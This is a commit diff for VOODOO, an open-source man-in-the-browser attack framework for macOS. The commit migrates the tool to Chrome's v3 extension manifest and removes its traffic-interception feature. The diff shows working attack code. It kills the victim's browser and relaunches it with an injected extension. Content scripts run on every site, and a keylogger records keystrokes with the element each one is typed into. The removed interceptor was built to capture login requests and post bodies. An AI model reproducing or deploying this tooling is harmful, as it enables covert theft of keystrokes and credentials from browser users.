Merge pull request #4 from breakpointHQ/v3ext

Support v3 manifest

Gemfile

@@ -2,9 +2,9 @@
 
 source "https://rubygems.org"
 
-git_source(:github) {|repo_name| "https://github.com/#{repo_name}" }
+git_source(:github) { |repo_name| "https://github.com/#{repo_name}" }
 
-gem 'thor'
+gem 'thor', '1.2.1'
 
 group :test do
     gem 'rake'

Gemfile.lock

@@ -25,7 +25,7 @@ DEPENDENCIES
   rake
   rspec (~> 3.0)
   rspec-core
-  thor
+  thor (= 1.2.1)
 
 BUNDLED WITH
    1.17.2

README.md

@@ -1,6 +1,6 @@
 # VOODOO
 VOODOO is a Man in the browser attack framework for macOS.
-It comes with built-in keylogging, traffic monitoring, and scripting capabilities.
+It comes with built-in keylogging, and scripting capabilities.
 VOODOO is highly extendable & shareable, it can execute `YAML` templates that define complex attacks.
 
 <p align="center">
@@ -26,7 +26,6 @@ Usage of this code for attacking targets without prior mutual consent is illegal
 
 ## Features
 * 📜 Content Scripts - inject arbitrary JavaScript to any page
-* 🔍 Interceptor - capture browser traffic (url, headers, body, etc)
 * 🔑 Keylogger - records user keystrokes on any site
 * 📋 VOODOO Templates - run advance man in the browser attacks from template files
 
@@ -103,47 +102,7 @@ $: voodoo script /tmp/myjs.js -b chrome -x "https://example.com"
 
 ## Intercept browser traffic
 
-```sh
-$: voodoo help intercept
-Usage:
-  voodoo intercept
-
-Options:
-  u, [--url-include=URL_INCLUDE]      
-  i, [--body-include=BODY_INCLUDE]    
-  h, [--header-exists=HEADER_EXISTS]  
-  f, [--format=FORMAT]                # pretty, json, payload
-                                      # Default: pretty
-  o, [--output=OUTPUT]                # File path
-  x, [--urls=one two three]           
-  m, [--matches=one two three]        
-                                      # Default: ["<all_urls>"]
-  b, [--browser=BROWSER]              
-                                      # Default: chrome
-      [--max-events=N]                
-
-Intercept browser requests
-```
-
-Intercept all requests
-```sh
-$: voodoo intercept -o /tmp/requests_log.txt
-```
-
-Intercept all requests from Opera browser only when the url include `/login`.
-```sh
-$: voodoo intercept -o /tmp/requests_log.txt --url-include "/login"
-```
-
-Intercept all requests when the post body include `@`.
-```sh
-$: voodoo intercept -o /tmp/requests_log.txt --body-include "@"
-```
-
-Intercept all requests when the url matches `https://example.com/*` or `https://example.net/*`
-```sh
-$: voodoo intercept -m "https://example.com/*" "https://example.net/*"
-```
+This is no longer supported due to migration to the v3 chrome extension manifest.
 
 ## Keylogger
 ```sh

Rakefile

@@ -16,7 +16,7 @@ task :dev do
   `gem uninstall get-voodoo`
   puts `bundle install`
   puts `gem build ./voodoo.gemspec`
-  puts `gem install ./get-voodoo-0.0.3.gem --user-install && rm ./get-voodoo-0.0.3.gem`
+  puts `gem install ./get-voodoo-0.1.0.gem --user-install`
 end
 
 desc 'Build VOODOO'

lib/voodoo/browser.rb

@@ -14,8 +14,8 @@ def initialize(bundle: nil, process_name: nil, extension: Extension.new)
             @process_name = process_name
             @collector_threads = []
 
-            @extension.manifest[:permissions] = ['tabs', '*://*/*', 'webRequest']
-            @extension.add_background_script(file: File.join(__dir__, 'js/collector.js'))
+            @extension.manifest[:permissions] = ['tabs', 'storage']
+            matches = '*://*/*'
         end
 
         def keylogger(matches: '*://*/*', max_events: nil)
@@ -25,30 +25,18 @@ def keylogger(matches: '*://*/*', max_events: nil)
             ) do |event|
                 yield event
             end
-        end
-
-        def intercept(matches: nil, url_include: nil, body_include: nil, header_exists: nil, max_events: nil)
-            options = {
-                matches: matches,
-                url_include: url_include,
-                body_include: body_include,
-                header_exists: header_exists
-            }
-
-            add_script(options: options,
-                       background: true,
-                       max_events: max_events,
-                       file: File.join(__dir__, 'js/intercept.js')
-            ) do |event|
-                yield event
-            end
-        end
+        end         
 
         def add_permissions(permissions)
             permissions = [permissions] unless permissions.is_a? Array
             @extension.manifest[:permissions] += permissions
         end
 
+        def add_host_permissions(hosts)
+            hosts = [hosts] unless hosts.is_a? Array
+            @extension.manifest[:host_permissions] += hosts
+        end
+
         def close_browser
             # kill the browser process twise, to bypass close warning
             `pkill -a -i "#{@process_name}"`
@@ -61,7 +49,7 @@ def hijack(urls = [], flags: '')
 
             urls = [urls] unless urls.kind_of? Array
             urls = urls.uniq
-
+            
             `open -b "#{@bundle}" --args #{flags} --load-extension="#{@extension.save}" #{urls.shift}`
 
             if urls.length > 0
@@ -153,12 +141,11 @@ def add_script(content: nil, file: nil, matches: nil, options: {}, background: f
             content = content % options
 
             if background == true
-                return @extension.add_background_script(content: content)
+                return @extension.add_service_worker(content: content)
             else
                 if matches == nil
                     matches = '*://*/*'
                 end
-
                 return @extension.add_content_script(matches, js: [content])
             end
         end

lib/voodoo/cli.rb

@@ -6,38 +6,14 @@
 
 module VOODOO
 
-    VERSION = 'v0.0.12'
+    VERSION = 'v0.1.1'
 
     class CLI < Thor
 
         desc 'version', 'Prints voodoo version'
         def version
             puts VERSION
         end
-
-        option :url_include, :type => :string, :aliases => :u, :default => nil
-        option :body_include, :type => :string, :aliases => :i, :default => nil
-        option :header_exists, :type => :string, :aliases => :h, :default => nil
-        option :format, :type => :string, :aliases => :f, :default => 'pretty', :desc => 'pretty, json, payload'
-        option :output, :type => :string, :aliases => :o, :desc => 'File path', :default => nil
-        option :urls, :type => :array, :aliases => :x, :default => []
-        option :matches, :type => :array, :aliases => :m, :default => ['<all_urls>']
-        option :browser, :type => :string, :aliases => :b, :default => 'chrome'
-        option :max_events, :type => :numeric, :default => nil
-        desc 'intercept', 'Intercept browser requests'
-        def intercept
-            browser = get_browser options[:browser]
-            output_handler = Output.new(file: options[:output], in_format: options[:format], for_command: 'intercept')
-
-            browser.intercept(matches: options[:matches],
-                              url_include: options[:url_include],
-                              body_include: options[:body_include],
-                              max_events: options[:max_events]) do |event|
-                output_handler.handle(event)
-            end
-
-            browser.hijack options[:urls]
-        end
 
         option :urls, :type => :array, :aliases => :x, :default => []
         option :format, :type => :string, :aliases => :f, :default => 'pretty', :desc => 'pretty, json, payload, none'
@@ -56,7 +32,7 @@ def script(path_or_js)
             file = nil
             content = nil
 
-            if File.exists? path_or_js
+            if File.exist? path_or_js
                 file = path_or_js
             else
                 content = path_or_js
@@ -113,6 +89,10 @@ def template(path)
             if template['permissions']
                 browser.add_permissions template['permissions']
             end
+
+            if template['host_permissions']
+                browser.add_host_permissions template['host_permissions']
+            end
 
             output_format = options[:format]
             is_default = output_format == 'none'
@@ -126,8 +106,11 @@ def template(path)
             template['scripts'].each do |script|
                 file = File.expand_path(File.join(pwd, script['file'])) if script['file']
                 content = script['content']
-                matches = script['matches']
+                matches = script['matches'] || ['*://*/*']
                 background = script['background'] || false
+                if background
+                    matches = nil
+                end
                 communication = true
 
                 if script.keys.include? 'communication'

lib/voodoo/extension.rb

@@ -17,24 +17,25 @@ def initialize
                 author: '~',
                 description: '',
                 version: '0.0.1',
-                manifest_version: 2,
-                background: {
-                    scripts: []
-                },
+                manifest_version: 3,
                 permissions: [],
-                content_scripts: []
+                host_permissions: [],
+                content_scripts: [],
+                background: {
+                    service_worker: nil
+                }
             }
         end
 
-        def add_background_script(content: nil, file: nil)
+        def add_service_worker(content: nil, file: nil)
             if content == nil && file != nil
                 content = File.read file
             end
             if content == nil
                 raise StandardError.new(':content or :file argument are required')
             end
             path = add_file(content, with_extension: '.js')
-            @manifest[:background][:scripts] << path
+            @manifest[:background][:service_worker] = path
         end
 
         def add_content_script(matches, js: [], css: [])
@@ -52,6 +53,10 @@ def add_content_script(matches, js: [], css: [])
 
         def save
             @manifest[:permissions] = @manifest[:permissions].uniq
+            service_worker = @manifest[:background][:service_worker]
+            if service_worker == nil || service_worker == ''
+                @manifest[:background].delete(:service_worker)
+            end
             manifest_path = File.join(@folder, 'manifest.json')
             File.write(manifest_path, JSON.generate(@manifest))
             return @folder

lib/voodoo/js/keylogger.js

@@ -40,9 +40,10 @@
     });
 
     window.addEventListener("keydown", function (event) {
-        if (lastElement !== event.path[0]) {
-            lastElement = event.path[0];
-            output += `\n[ELEMENT => ${describe(event.path[0])}]\n`
+        const path = event.composedPath();
+        if (lastElement !== path[0]) {
+            lastElement = path[0];
+            output += `\n[ELEMENT => ${describe(path[0])}]\n`;
         }
         if (event.key.length > 1) {
             output += `[${event.key}]`;